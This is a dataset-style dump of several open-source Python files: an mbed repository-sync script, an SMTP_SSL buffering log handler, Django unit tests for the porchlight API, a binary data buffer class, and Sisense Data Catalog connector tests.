text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
---|---|---|---|---|---|---|
"""
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
One repository to update them all
On mbed.org the mbed SDK is split up in multiple repositories, this script takes
care of updating them all.
"""
import sys
from copy import copy
from os import walk, remove, makedirs
from os.path import join, abspath, dirname, relpath, exists, isfile
from shutil import copyfile
from optparse import OptionParser
import re
import string
ROOT = abspath(join(dirname(__file__), ".."))
sys.path.insert(0, ROOT)
from workspace_tools.settings import MBED_ORG_PATH, MBED_ORG_USER, BUILD_DIR
from workspace_tools.paths import *
from workspace_tools.utils import run_cmd
MBED_URL = "mbed.org"
MBED_USER = "mbed_official"
changed = []
push_remote = True
quiet = False
commit_msg = ''
# Code that does have a mirror in the mbed SDK
# Tuple data: (repo_name, list_of_code_dirs, [team])
# team is optional - if not specified, the code is published under mbed_official
OFFICIAL_CODE = (
("mbed-dev" , MBED_BASE),
("mbed-rtos", RTOS),
("mbed-dsp" , DSP),
("mbed-rpc" , MBED_RPC),
("lwip" , LWIP_SOURCES+"/lwip"),
("lwip-sys", LWIP_SOURCES+"/lwip-sys"),
("Socket" , LWIP_SOURCES+"/Socket"),
("lwip-eth" , ETH_SOURCES+"/lwip-eth"),
("EthernetInterface", ETH_SOURCES+"/EthernetInterface"),
("USBDevice", USB),
("USBHost" , USB_HOST),
("CellularModem", CELLULAR_SOURCES),
("CellularUSBModem", CELLULAR_USB_SOURCES),
("UbloxUSBModem", UBLOX_SOURCES),
("UbloxModemHTTPClientTest", [TEST_DIR+"/net/cellular/http/common", TEST_DIR+"/net/cellular/http/ubloxusb"]),
("UbloxModemSMSTest", [TEST_DIR+"/net/cellular/sms/common", TEST_DIR+"/net/cellular/sms/ubloxusb"]),
("FATFileSystem", FAT_FS, "mbed-official"),
)
# Code that does have dependencies to libraries should point to
# the latest revision. By default, they point to a specific revision.
CODE_WITH_DEPENDENCIES = (
# Libraries
"EthernetInterface",
# RTOS Examples
"rtos_basic",
"rtos_isr",
"rtos_mail",
"rtos_mutex",
"rtos_queue",
"rtos_semaphore",
"rtos_signals",
"rtos_timer",
# Net Examples
"TCPEchoClient",
"TCPEchoServer",
"TCPSocket_HelloWorld",
"UDPSocket_HelloWorld",
"UDPEchoClient",
"UDPEchoServer",
"BroadcastReceive",
"BroadcastSend",
# mbed sources
"mbed-src-program",
)
# A list of regular expressions that will be checked against each directory
# name and skipped if they match.
IGNORE_DIRS = (
)
IGNORE_FILES = (
'COPYING',
'\.md',
"\.lib",
"\.bld"
)
def ignore_path(name, reg_exps):
for r in reg_exps:
if re.search(r, name):
return True
return False
class MbedRepository:
@staticmethod
def run_and_print(command, cwd):
stdout, _, _ = run_cmd(command, wd=cwd, redirect=True)
print(stdout)
def __init__(self, name, team = None):
self.name = name
self.path = join(MBED_ORG_PATH, name)
if team is None:
self.url = "http://" + MBED_URL + "/users/" + MBED_USER + "/code/%s/"
else:
self.url = "http://" + MBED_URL + "/teams/" + team + "/code/%s/"
if not exists(self.path):
# Checkout code
if not exists(MBED_ORG_PATH):
makedirs(MBED_ORG_PATH)
self.run_and_print(['hg', 'clone', self.url % name], cwd=MBED_ORG_PATH)
else:
# Update
self.run_and_print(['hg', 'pull'], cwd=self.path)
self.run_and_print(['hg', 'update'], cwd=self.path)
def publish(self):
# The maintainer has to evaluate the changes first and explicitly accept them
self.run_and_print(['hg', 'addremove'], cwd=self.path)
stdout, _, _ = run_cmd(['hg', 'status'], wd=self.path)
if stdout == '':
print "No changes"
return False
print stdout
if quiet:
commit = 'Y'
else:
commit = raw_input(push_remote and "Do you want to commit and push? Y/N: " or "Do you want to commit? Y/N: ")
if commit == 'Y':
args = ['hg', 'commit', '-u', MBED_ORG_USER]
if commit_msg:
args = args + ['-m', commit_msg]
self.run_and_print(args, cwd=self.path)
if push_remote:
self.run_and_print(['hg', 'push'], cwd=self.path)
return True
# Check if a file is a text file or a binary file
# Taken from http://code.activestate.com/recipes/173220/
text_characters = "".join(map(chr, range(32, 127)) + list("\n\r\t\b"))
_null_trans = string.maketrans("", "")
def is_text_file(filename):
block_size = 1024
def istext(s):
if "\0" in s:
return 0
if not s: # Empty files are considered text
return 1
# Get the non-text characters (maps a character to itself then
# use the 'remove' option to get rid of the text characters.)
t = s.translate(_null_trans, text_characters)
# If more than 30% non-text characters, then
# this is considered a binary file
if float(len(t))/len(s) > 0.30:
return 0
return 1
with open(filename) as f:
res = istext(f.read(block_size))
return res
# Return the line ending type for the given file ('cr' or 'crlf')
def get_line_endings(f):
examine_size = 1024
try:
tf = open(f, "rb")
lines, ncrlf = tf.readlines(examine_size), 0
tf.close()
for l in lines:
if l.endswith("\r\n"):
ncrlf = ncrlf + 1
return 'crlf' if ncrlf > len(lines) >> 1 else 'cr'
except:
return 'cr'
# Copy file to destination, but preserve destination line endings if possible
# This prevents very annoying issues with huge diffs that appear because of
# differences in line endings
def copy_with_line_endings(sdk_file, repo_file):
if not isfile(repo_file):
copyfile(sdk_file, repo_file)
return
is_text = is_text_file(repo_file)
if is_text:
sdk_le = get_line_endings(sdk_file)
repo_le = get_line_endings(repo_file)
if not is_text or sdk_le == repo_le:
copyfile(sdk_file, repo_file)
else:
print "Converting line endings in '%s' to '%s'" % (abspath(repo_file), repo_le)
f = open(sdk_file, "rb")
data = f.read()
f.close()
f = open(repo_file, "wb")
data = data.replace("\r\n", "\n") if repo_le == 'cr' else data.replace('\n','\r\n')
f.write(data)
f.close()
def visit_files(path, visit):
for root, dirs, files in walk(path):
# Ignore hidden directories
for d in copy(dirs):
full = join(root, d)
if d.startswith('.'):
dirs.remove(d)
if ignore_path(full, IGNORE_DIRS):
print "Skipping '%s'" % full
dirs.remove(d)
for file in files:
if ignore_path(file, IGNORE_FILES):
continue
visit(join(root, file))
def update_repo(repo_name, sdk_paths, team_name):
repo = MbedRepository(repo_name, team_name)
# copy files from mbed SDK to mbed_official repository
def visit_mbed_sdk(sdk_file):
repo_file = join(repo.path, relpath(sdk_file, sdk_path))
repo_dir = dirname(repo_file)
if not exists(repo_dir):
makedirs(repo_dir)
copy_with_line_endings(sdk_file, repo_file)
for sdk_path in sdk_paths:
visit_files(sdk_path, visit_mbed_sdk)
# remove repository files that do not exist in the mbed SDK
def visit_repo(repo_file):
for sdk_path in sdk_paths:
sdk_file = join(sdk_path, relpath(repo_file, repo.path))
if exists(sdk_file):
break
else:
remove(repo_file)
print "remove: %s" % repo_file
visit_files(repo.path, visit_repo)
if repo.publish():
changed.append(repo_name)
def update_code(repositories):
for r in repositories:
repo_name, sdk_dir = r[0], r[1]
team_name = r[2] if len(r) == 3 else None
print '\n=== Updating "%s" ===' % repo_name
sdk_dirs = [sdk_dir] if type(sdk_dir) != type([]) else sdk_dir
update_repo(repo_name, sdk_dirs, team_name)
def update_single_repo(repo):
repos = [r for r in OFFICIAL_CODE if r[0] == repo]
if not repos:
print "Repository '%s' not found" % repo
else:
update_code(repos)
def update_dependencies(repositories):
for repo_name in repositories:
print '\n=== Updating "%s" ===' % repo_name
repo = MbedRepository(repo_name)
# point to the latest libraries
def visit_repo(repo_file):
with open(repo_file, "r") as f:
url = f.read()
with open(repo_file, "w") as f:
f.write(url[:(url.rindex('/')+1)])
visit_files(repo.path, visit_repo, None, MBED_REPO_EXT)
if repo.publish():
changed.append(repo_name)
def update_mbed():
update_repo("mbed", [join(BUILD_DIR, "mbed")], None)
def do_sync(options):
global push_remote, quiet, commit_msg, changed
push_remote = not options.nopush
quiet = options.quiet
commit_msg = options.msg
chnaged = []
if options.code:
update_code(OFFICIAL_CODE)
if options.dependencies:
update_dependencies(CODE_WITH_DEPENDENCIES)
if options.mbed:
update_mbed()
if options.repo:
update_single_repo(options.repo)
if changed:
print "Repositories with changes:", changed
return changed
if __name__ == '__main__':
parser = OptionParser()
parser.add_option("-c", "--code",
action="store_true", default=False,
help="Update the mbed_official code")
parser.add_option("-d", "--dependencies",
action="store_true", default=False,
help="Update the mbed_official code dependencies")
parser.add_option("-m", "--mbed",
action="store_true", default=False,
help="Release a build of the mbed library")
parser.add_option("-n", "--nopush",
action="store_true", default=False,
help="Commit the changes locally only, don't push them")
parser.add_option("", "--commit_message",
action="store", type="string", default='', dest='msg',
help="Commit message to use for all the commits")
parser.add_option("-r", "--repository",
action="store", type="string", default='', dest='repo',
help="Synchronize only the given repository")
parser.add_option("-q", "--quiet",
action="store_true", default=False,
help="Don't ask for confirmation before commiting or pushing")
(options, args) = parser.parse_args()
do_sync(options)
|
bikeNomad/mbed
|
workspace_tools/synch.py
|
Python
|
apache-2.0
| 11,453 | 0.005413 |
#!/usr/bin/env python
#
#
"""Test harness for the logging module. Tests BufferingSMTPHandler, an alternative implementation
of SMTPHandler.
Copyright (C) 2001-2002 Vinay Sajip. All Rights Reserved.
Modified to handle SMTP_SSL connections
"""
import string, logging, logging.handlers
from logging import Formatter
class BufferingSMTP_SSLHandler(logging.handlers.BufferingHandler):
'''
Modified to handle SMTP_SSL connections
'''
# Copyright 2001-2002 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# This file is part of the Python logging distribution. See
# http://www.red-dove.com/python_logging.html
def __init__(self, server, port, username, password, fromaddr, toaddrs, subject, capacity):
logging.handlers.BufferingHandler.__init__(self, capacity)
self.fromaddr = fromaddr
self.toaddrs = toaddrs
self.subject = subject
self.mailhost = server
self.mailport = port
self.username = username
self.password = password
self.setFormatter(logging.Formatter("%(asctime)s %(levelname)-5s %(message)s"))
def flush(self):
if len(self.buffer) > 0:
try:
import smtplib
smtp = smtplib.SMTP_SSL(self.mailhost, self.mailport)
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n" % (self.fromaddr, string.join(self.toaddrs, ","), self.subject)
for record in self.buffer:
s = self.format(record)
print s
msg = msg + s + "\r\n"
smtp.login(self.username, self.password)
smtp.sendmail(self.fromaddr, self.toaddrs, msg)
smtp.quit()
except:
self.handleError(None) # no particular record
self.buffer = []
'''
Set up logging
'''
if app.config['LOG_TO_FILE']:
file_handler = logging.handlers.RotatingFileHandler(
app.config['LOG_FILENAME'],
maxBytes=100000,
backupCount=5)
file_handler.setLevel(app.config['LOG_FILE_LEVEL'])
file_handler.setFormatter(Formatter(
'%(asctime)s %(levelname)s: %(message)s '
'[in %(pathname)s:%(lineno)d]'
))
app.logger.addHandler(file_handler)
if app.config['LOG_TO_EMAIL']:
mail_handler = BufferingSMTP_SSLHandler(
app.config['MAIL_SERVER'],
app.config['MAIL_PORT'],
app.config['MAIL_USERNAME'],
app.config['MAIL_PASSWORD'],
app.config['DEFAULT_MAIL_SENDER'],
app.config['LOG_EMAIL_TO'],
app.config['LOG_EMAIL_SUBJECT'],
0,
)
mail_handler.setLevel(logging.WARNING)
mail_handler.setFormatter(Formatter('''
Message type: %(levelname)s
Location: %(pathname)s:%(lineno)d
Module: %(module)s
Function: %(funcName)s
Time: %(asctime)s
Message:
%(message)s
'''))
app.logger.addHandler(mail_handler)
|
gary-dalton/Twenty47
|
twenty47/logging.py
|
Python
|
mit
| 3,990 | 0.003509 |
# -*- coding: utf-8 -*-
from django.test import TestCase
import mock
import datetime
from dateutil import tz
## Repository Test
from porchlightapi.models import Repository
# Constant values used for testing
UNDEPLOYED_VALUE_TUPLE = ('c9d2d5b79edd7d4acaf7172a98203bf3aee2586a',
datetime.datetime(year=1972, month=3, day=17, hour=8, minute=23, tzinfo=tz.tzutc()),
5)
DEPLOYED_VALUE_TUPLE = ('ba60a64b151e402a9f08f95710ec09db4649eb2e',
datetime.datetime(year=1972, month=2, day=29, hour=10, minute=45, tzinfo=tz.tzutc()),
2)
class RepositoryTestCase(TestCase):
def setUp(self):
# Create a repository object for us to test
Repository.objects.create(
url='https://github.com/cfpb/porchlight',
name='Porchlight',
project='System Tools',
deployed_value_source='porchlightapi.sources.random_source',
undeployed_value_source='porchlightapi.sources.random_source',
value_calculator='porchlightapi.sources.difference_value_calculator')
@mock.patch("porchlightapi.sources.random_source")
def test_undeployed_value_source(self, random_source):
"""
Test that the model's undeployed_value() function correctly
uses the lookup function to get and run the mock data source
function.
"""
random_source.return_value = UNDEPLOYED_VALUE_TUPLE
test_repo = Repository.objects.get(url='https://github.com/cfpb/porchlight')
undeployed_value_tuple = test_repo.undeployed_value()
self.assertEqual(undeployed_value_tuple[0], UNDEPLOYED_VALUE_TUPLE[0])
self.assertEqual(undeployed_value_tuple[1], UNDEPLOYED_VALUE_TUPLE[1])
self.assertEqual(undeployed_value_tuple[2], UNDEPLOYED_VALUE_TUPLE[2])
@mock.patch("porchlightapi.sources.random_source")
def test_deployed_value_source(self, random_source):
"""
Test that the model's undeployed_value() function correctly
uses the lookup function to get and run the mock data source
function.
"""
random_source.return_value = DEPLOYED_VALUE_TUPLE
test_repo = Repository.objects.get(url='https://github.com/cfpb/porchlight')
deployed_value_tuple = test_repo.deployed_value()
self.assertEqual(deployed_value_tuple[0], DEPLOYED_VALUE_TUPLE[0])
self.assertEqual(deployed_value_tuple[1], DEPLOYED_VALUE_TUPLE[1])
self.assertEqual(deployed_value_tuple[2], DEPLOYED_VALUE_TUPLE[2])
@mock.patch("porchlightapi.sources.difference_value_calculator")
def test_value(self, difference_value_calculator):
"""
Test that the model's value() function correctly uses the lookup function
to get and run the value calculator function.
"""
difference_value_calculator.return_value = 3
test_repo = Repository.objects.get(url='https://github.com/cfpb/porchlight')
self.assertEqual(test_repo.value(UNDEPLOYED_VALUE_TUPLE, DEPLOYED_VALUE_TUPLE),
5 - 2)
## Value Data Points
from porchlightapi.models import ValueDataPointManager
class ValueDataPointManagerTestCase(TestCase):
@mock.patch('porchlightapi.models.ValueDataPoint')
def test_create_datapoint(self, ValueDataPoint):
"""
Test the ValueDataPointManager's creation of ValueDataPoint
objects from Repository objects. The manager should populate
the ValueDataPoint using the Repository's value methods, which
call the appropriate callables.
"""
# Create a mock repository to pass to the ValueDataPointManager
# create_datapoint() method with the appropriate return values.
mock_repository = mock.create_autospec(Repository)
mock_repository.undeployed_value.return_value = UNDEPLOYED_VALUE_TUPLE
mock_repository.deployed_value.return_value = DEPLOYED_VALUE_TUPLE
mock_repository.value.return_value = 3
# We want to test that the create_datapoint method extracts the correct
# values from the repository and calls the default create() method with
# those values.
objects = ValueDataPointManager()
objects.create = mock.MagicMock()
datapoint = objects.create_datapoint(mock_repository)
objects.create.assert_called_with(
repository=mock_repository,
undeployed_identifier=UNDEPLOYED_VALUE_TUPLE[0],
undeployed_datetime=UNDEPLOYED_VALUE_TUPLE[1],
undeployed_value=UNDEPLOYED_VALUE_TUPLE[2],
deployed_identifier=DEPLOYED_VALUE_TUPLE[0],
deployed_datetime=DEPLOYED_VALUE_TUPLE[1],
deployed_value=DEPLOYED_VALUE_TUPLE[2],
value=3)
## Test Data Sources
import datetime
from porchlightapi.sources import github_commit_source
from porchlightapi.sources import github_tag_source
from porchlightapi.sources import json_file_source
class GithubDataSourceTestCase(TestCase):
def setUp(self):
"""
Set up the mock request responses for Github.
"""
# Call to /repos/porchlight is only interested in size
self.mock_repo_response = mock.MagicMock()
self.mock_repo_response.json.return_value = {u'size': 1619,}
# Call to /repos/porchlight/branches/master is used to
# get last commit SHA and URL
self.mock_branches_response = mock.MagicMock()
self.mock_branches_response.json.return_value = {u'commit':
{u'sha': u'130df1874519c11a79ac4a2e3e6671a165860441',
u'url': u'https://api.github.com/repos/cfpb/porchlight/commits/130df1874519c11a79ac4a2e3e6671a165860441'}
}
# Call to /repos/porchlight/tags is used to get latest commit SHA and
# tag name
self.mock_tags_response = mock.MagicMock()
self.mock_tags_response.json.return_value = [{
u'commit':{u'sha':u'130df1874519c11a79ac4a2e3e6671a165860441'},
u'name':u'v0.1.0'
},]
self.mock_no_tags_response = mock.MagicMock()
self.mock_no_tags_response.json.return_value = [{
u'commit':{u'sha':u'130df1874519c11a79ac4a2e3e6671a165860441'},
u'name':u'atag'
},]
# Call to the commit itself /repos/porchlight/commits/130df1874519c11a79ac4a2e3e6671a165860441
# is used to get the date and file data
self.mock_commit_response = mock.MagicMock()
self.mock_commit_response.json.return_value = {
u'commit': {u'committer': {u'date': u'2015-01-26 21:44:20Z',},},
u'files':[
{'additions': 1, 'deletions': 2, 'changes':3},
{'additions': 4, 'deletions': 5, 'changes':6},
{'additions': 7, 'deletions': 8, 'changes':9},
]
}
self.test_date = datetime.datetime(year=2015, month=01, day=26, hour=21,
minute=44, second=20, tzinfo=tz.tzutc())
# A mock repository with a URL
self.mock_repository = mock.create_autospec(Repository)
self.mock_repository.url = 'https://github.com/cfpb/porchlight'
@mock.patch("requests.get")
def test_github_commit_source(self, mock_request_get):
# Test that our Github source function correctly constructs URLs by
# mocking requests.get()
# There should be 3 calls to request.get(), one for the repository (to
# get size), one for branches, and one for commits.
# XXX: Because we're not using the repo size, it's been commented out to
# reduce API hits.
mock_request_get.side_effect = [
# self.mock_repo_response,
self.mock_branches_response,
self.mock_commit_response
]
source_tuple = github_commit_source(self.mock_repository)
self.assertEqual(source_tuple[0], '130df1874519c11a79ac4a2e3e6671a165860441')
self.assertEqual(source_tuple[1], self.test_date)
self.assertEqual(source_tuple[2], 15)
@mock.patch("requests.get")
def test_github_tag_source(self, mock_request_get):
# Test that our Github source function correctly constructs URLs by
# mocking requests.get().
# For tags there should be two calls to request.get(), one for tags and
# then one for the commit for the tag we're interested in.
mock_request_get.side_effect = [
self.mock_tags_response,
self.mock_commit_response
]
source_tuple = github_tag_source(self.mock_repository)
self.assertEqual(source_tuple[0], '130df1874519c11a79ac4a2e3e6671a165860441')
self.assertEqual(source_tuple[1], self.test_date)
self.assertEqual(source_tuple[2], 15)
# Now test that if there is no tag that matches our pattern that we
# return as close to a 'no-value' as we can.
mock_request_get.side_effect = [
self.mock_no_tags_response,
self.mock_commit_response
]
source_tuple = github_tag_source(self.mock_repository)
self.assertEqual(source_tuple[0], '')
self.assertEqual(source_tuple[1], None)
self.assertEqual(source_tuple[2], 0)
@mock.patch("__builtin__.open")
@mock.patch("json.load")
@mock.patch("requests.get")
def test_repo_json(self, mock_request_get, mock_json_load, mock_open):
test_date = datetime.datetime(year=2015, month=01, day=26, hour=21,
minute=44, second=20, tzinfo=tz.tzutc())
# We just want to ignore the call to open() altogether
mock_open.return_value = None
# Mock the contents of the json file.
mock_json_load.return_value = [{u'commit': '130df1874519c11a79ac4a2e3e6671a165860441',
u'repo': 'https://github.com/CFPB/porchlight.git',
u'date': u'Mon Jan 26 21:44:20 UTC 2015'},]
# Mock the requests.get() calls to github API. This differs from
# github_commit_source() above because we get the commit SHA from the
# json data rather than from the tip of a branch.
mock_request_get.side_effect = [
# self.mock_repo_response,
self.mock_commit_response
]
source_tuple = json_file_source(self.mock_repository)
self.assertEqual(source_tuple[0], '130df1874519c11a79ac4a2e3e6671a165860441')
self.assertEqual(source_tuple[1], self.test_date)
self.assertEqual(source_tuple[2], 15)
## Test Value Calculators
from django.db import models
from porchlightapi.sources import incremental_value_calculator
class ValueCalculatorTestCase(TestCase):
def test_incremental_value_calculator(self):
mock_repository = mock.MagicMock()
mock_repository.datapoints = mock.MagicMock()
# Test an empty list of datapoints — should return the undeployed value
# tuple's value.
mock_repository.datapoints.all.return_value = []
value = incremental_value_calculator(mock_repository,
UNDEPLOYED_VALUE_TUPLE, DEPLOYED_VALUE_TUPLE)
self.assertEqual(value, 5)
# Test a prior datapoint to make sure its value is incremented by the
# undeployed value tuple's value.
mock_last_datapoint = mock.MagicMock()
mock_last_datapoint.value = 2
mock_repository.datapoints.all.return_value = [mock_last_datapoint,]
value = incremental_value_calculator(mock_repository,
UNDEPLOYED_VALUE_TUPLE, DEPLOYED_VALUE_TUPLE)
self.assertEqual(value, 7)
# Test the same value tuple to simulate deployed and undeployed being on
# the same commit, to make sure the returned value is 0.
value = incremental_value_calculator(mock_repository,
UNDEPLOYED_VALUE_TUPLE, UNDEPLOYED_VALUE_TUPLE)
self.assertEqual(value, 0)
|
cfpb/porchlight
|
porchlightapi/tests.py
|
Python
|
cc0-1.0
| 12,039 | 0.004902 |
"""
* Copyright (C) Caleb Marshall and others... - All Rights Reserved
* Written by Caleb Marshall <anythingtechpro@gmail.com>, May 27th, 2017
* Licensing information can found in 'LICENSE', which is part of this source code package.
"""
import struct
class Endianness(object):
"""
A enum that stores network endianess formats
"""
NATIVE = '='
LITTLE_ENDIAN = '<'
BIG_ENDIAN = '>'
NETWORK = '!'
class DataBufferError(IOError):
"""
A data buffer specific io error
"""
class DataBufferIO(object):
"""
A class for manipulating (reading and/or writing) an array of bytes
"""
BYTE_ORDER = Endianness.NETWORK
def __init__(self, data=bytes(), offset=0):
self.data = data
self.offset = offset
@property
def byte_order(self):
return self.BYTE_ORDER
@property
def remaining(self):
return self.data[self.offset:]
def read(self, length):
data = self.remaining[:length]
self.offset += length
return data
def write(self, data):
if not data:
return
self.data += data
def clear(self):
self.data = bytes()
self.offset = 0
def read_from(self, fmt):
data = struct.unpack_from(self.byte_order + fmt, self.data, self.offset)
self.offset += struct.calcsize(fmt)
return data
def write_to(self, fmt, *args):
self.write(struct.pack(self.byte_order + fmt, *args))
def read_byte(self):
return self.read_from('b')[0]
def write_byte(self, value):
self.write_to('b', value)
def read_ubyte(self):
return self.read_from('B')[0]
def write_ubyte(self, value):
self.write_to('B', value)
def read_bool(self):
return self.read_from('?')[0]
def write_bool(self, value):
self.write_to('?', value)
def read_short(self):
return self.read_from('h')[0]
def write_short(self, value):
self.write_to('h', value)
def read_ushort(self):
return self.read_from('H')[0]
def write_ushort(self, value):
self.write_to('H', value)
def read_int(self):
return self.read_from('i')[0]
def write_int(self, value):
self.write_to('i', value)
def read_uint(self):
return self.read_from('I')[0]
def write_uint(self, value):
self.write_to('I', value)
def read_long(self):
return self.read_from('l')[0]
def write_long(self, value):
self.write_to('l', value)
def read_ulong(self):
return self.read_from('L')[0]
def write_ulong(self, value):
self.write_to('L', value)
def read_long_long(self):
return self.read_from('q')[0]
def write_long_long(self, value):
self.write_to('q', value)
def read_ulong_long(self):
return self.read_from('Q')[0]
def write_ulong_long(self, value):
self.write_to('Q', value)
def read_float(self):
return self.read_from('f')[0]
def write_float(self, value):
self.write_to('f', value)
def read_double(self):
return self.read_from('d')[0]
def write_double(self, value):
self.write_to('d', value)
def read_char(self):
return self.read_from('s')[0]
def write_char(self, value):
self.write_to('s', value)
|
AnythingTechPro/curionet
|
curionet/io.py
|
Python
|
apache-2.0
| 3,368 | 0.001485 |
#!/usr/bin/python
#
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from unittest import mock
from typing import Any, Dict
from google.cloud import datacatalog
from google.datacatalog_connectors.commons import prepare as commons_prepare
from google.datacatalog_connectors.sisense import prepare
class AssembledEntryFactoryTest(unittest.TestCase):
__PREPARE_PACKAGE = 'google.datacatalog_connectors.sisense.prepare'
__FACTORY_MODULE = f'{__PREPARE_PACKAGE}.assembled_entry_factory'
__FACTORY_CLASS = f'{__FACTORY_MODULE}.AssembledEntryFactory'
__PRIVATE_METHOD_PREFIX = f'{__FACTORY_CLASS}._AssembledEntryFactory'
@mock.patch(f'{__PREPARE_PACKAGE}.datacatalog_tag_factory'
f'.DataCatalogTagFactory')
@mock.patch(f'{__FACTORY_MODULE}.datacatalog_entry_factory'
f'.DataCatalogEntryFactory')
def setUp(self, mock_entry_factory, mock_tag_factory):
self.__factory = prepare.AssembledEntryFactory(
project_id='test-project',
location_id='test-location',
entry_group_id='test-entry-group',
user_specified_system='test-system',
server_address='https://test.server.com')
self.__mock_entry_factory = mock_entry_factory.return_value
self.__mock_tag_factory = mock_tag_factory.return_value
def test_constructor_should_set_instance_attributes(self):
attrs = self.__factory.__dict__
self.assertEqual(
self.__mock_entry_factory,
attrs['_AssembledEntryFactory__datacatalog_entry_factory'])
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entries_for_folder')
def test_make_assembled_entries_list_should_process_folders(
self, mock_make_assembled_entries_for_folder):
folder = self.__make_fake_folder()
mock_make_assembled_entries_for_folder.return_value = \
[commons_prepare.AssembledEntryData('test-folder', {})]
assembled_entries = self.__factory.make_assembled_entries_list(
folder, {})
self.assertEqual(1, len(assembled_entries))
mock_make_assembled_entries_for_folder.assert_called_once()
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entries_for_dashboard')
def test_make_assembled_entries_list_should_process_dashboards(
self, mock_make_assembled_entries_for_dashboard):
dashboard = self.__make_fake_dashboard()
mock_make_assembled_entries_for_dashboard.return_value = \
[commons_prepare.AssembledEntryData('test-dashboard', {})]
assembled_entries = self.__factory.make_assembled_entries_list(
dashboard, {})
self.assertEqual(1, len(assembled_entries))
mock_make_assembled_entries_for_dashboard.assert_called_once()
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}__make_assembled_entry_for_folder')
def test_make_assembled_entries_for_folder_should_process_folder(
self, mock_make_assembled_entry_for_folder):
folder = self.__make_fake_folder()
tag_templates_dict = {}
assembled_entries = self.__factory\
._AssembledEntryFactory__make_assembled_entries_for_folder(
folder, tag_templates_dict)
self.assertEqual(1, len(assembled_entries))
mock_make_assembled_entry_for_folder.assert_called_once_with(
folder, tag_templates_dict)
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}__make_assembled_entry_for_folder')
def test_make_assembled_entries_for_folder_should_process_child_folders(
self, mock_make_assembled_entry_for_folder):
child_folder = self.__make_fake_folder()
parent_folder = self.__make_fake_folder()
parent_folder['folders'] = [child_folder]
tag_templates_dict = {}
assembled_entries = self.__factory\
._AssembledEntryFactory__make_assembled_entries_for_folder(
parent_folder, tag_templates_dict)
self.assertEqual(2, len(assembled_entries))
self.assertEqual(2, mock_make_assembled_entry_for_folder.call_count)
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entry_for_dashboard')
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}__make_assembled_entry_for_folder')
def test_make_assembled_entries_for_folder_should_process_nested_dashboards( # noqa: E501
self, mock_make_assembled_entry_for_folder,
mock_make_assembled_entry_for_dashboard):
dashboard = self.__make_fake_dashboard()
folder = self.__make_fake_folder()
folder['dashboards'] = [dashboard]
tag_templates_dict = {}
assembled_entries = self.__factory\
._AssembledEntryFactory__make_assembled_entries_for_folder(
folder, tag_templates_dict)
self.assertEqual(2, len(assembled_entries))
mock_make_assembled_entry_for_folder.assert_called_once_with(
folder, tag_templates_dict)
mock_make_assembled_entry_for_dashboard.assert_called_once_with(
dashboard, tag_templates_dict)
def test_make_assembled_entry_for_folder_should_make_entry_and_tags(self):
folder = self.__make_fake_folder()
tag_template = datacatalog.TagTemplate()
tag_template.name = 'tagTemplates/sisense_folder_metadata'
tag_templates_dict = {'sisense_folder_metadata': tag_template}
fake_entry = ('test-folder', {})
entry_factory = self.__mock_entry_factory
entry_factory.make_entry_for_folder.return_value = fake_entry
fake_tag = datacatalog.Tag()
fake_tag.template = 'tagTemplates/sisense_folder_metadata'
tag_factory = self.__mock_tag_factory
tag_factory.make_tag_for_folder.return_value = fake_tag
assembled_entry = self.__factory\
._AssembledEntryFactory__make_assembled_entry_for_folder(
folder, tag_templates_dict)
self.assertEqual('test-folder', assembled_entry.entry_id)
self.assertEqual({}, assembled_entry.entry)
entry_factory.make_entry_for_folder.assert_called_once_with(folder)
tags = assembled_entry.tags
self.assertEqual(1, len(tags))
self.assertEqual('tagTemplates/sisense_folder_metadata',
tags[0].template)
tag_factory.make_tag_for_folder.assert_called_once_with(
tag_template, folder)
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entry_for_dashboard')
def test_make_assembled_entries_for_dashboard_should_process_dashboard(
self, mock_make_assembled_entry_for_dashboard):
dashboard = self.__make_fake_dashboard()
tag_templates_dict = {}
assembled_entries = self.__factory\
._AssembledEntryFactory__make_assembled_entries_for_dashboard(
dashboard, tag_templates_dict)
self.assertEqual(1, len(assembled_entries))
mock_make_assembled_entry_for_dashboard.assert_called_once_with(
dashboard, tag_templates_dict)
